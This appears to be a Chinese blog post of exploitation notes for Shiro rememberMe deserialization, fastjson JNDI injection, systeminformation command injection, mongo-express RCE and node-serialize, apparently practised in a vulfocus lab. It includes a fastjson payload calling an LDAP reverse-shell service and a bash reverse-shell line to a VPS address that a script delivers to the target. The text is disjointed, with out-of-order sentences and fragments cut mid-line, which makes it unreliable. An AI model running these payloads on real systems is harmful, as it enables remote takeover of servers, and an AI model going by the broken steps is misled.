Long___Xiao的博客

Shiro550和Shiro721的区别在于，Shiro550的AES密钥是硬编码固定的，攻击者可以利用该密钥进行恶意数据伪造生成一个cookie的rememberMe值，服务器在使用相同的密钥进行解密导致恶意构造数据得以执行。而Shiro721的ASE密钥是系统随机生成的，需要通过登录成功后得到rememberMe值，将rememberMe值作为前缀和命令执行的payload进行爆破，生成正确的rememberMe cookie实现payload的执行。使用的工具在github上都有。

在处理cookie时，Shiro会遵循以下流程：获取rememberMe的cookie值，进行Base64解码，使用AES解密，然后进行反序列化。然而，在Shiro版本1.2.4及更早的版本中，AES的密钥是硬编码（固定）的，即密钥是固定且写在代码中的。在使用加密脚本进行伪造cookie，脚本里的popen参数中改成你的ysoserial名称，运行报No module named Crypto.Cipher就需要安装pycryptodome库，存在rememberMe=deleteMe字段，尝试利用。

如果这些特定方法中存在可被恶意利用的逻辑（通常被称为“Gadget”），那么攻击者就可能利用这些逻辑执行恶意代码，从而导致严重的安全问题。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,

Node.JS 的系统信息库（npm 包“systeminformation”）是一个开源函数集合，用于检索详细的硬件、系统和操作系统信息。在5.3.1版本之前的systeminformation中存在命令注入漏洞。作为解决方法而不是升级，请务必检查或清理传递给 si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad() …的服务参数，仅允许字符串，拒绝任何数组。/目标IP/api/getServices?POC为：http:/

0.54.0 之前的 mongo-express 容易通过使用“toBSON”方法的端点进行远程代码执行。VPS上创建shell脚本：echo “bash -i >& /dev/tcp/192.168.1.1/7410 0>&1” > shell.sh。尝试直接反弹shell，“bash -i >& /dev/tcp/192.168.1.1/7410 0>&1”发现不行，在自己的VPS上创建shell脚本文件，远程控制下载到本地运行。-O /tmp/shell.sh”)，IP改为VPS的。

0.0.4 中发现了一个问题。通过传递带有立即调用函数表达式 (IIFE) 的 JavaScript 对象，可以利用传递到 unserialize() 函数的不受信任数据来实现任意代码执行。在自己服务器上用NC监听payload的端口，提交后反弹成功后便可以执行命令。0.0.4 进行反序列化的node.js应用程序。用户随便输入，在密码处填写payload。在 Node.js 的节点序列化包。使用vulfocus启动靶场环境。使用node-serialize。IP和端口改成自己的。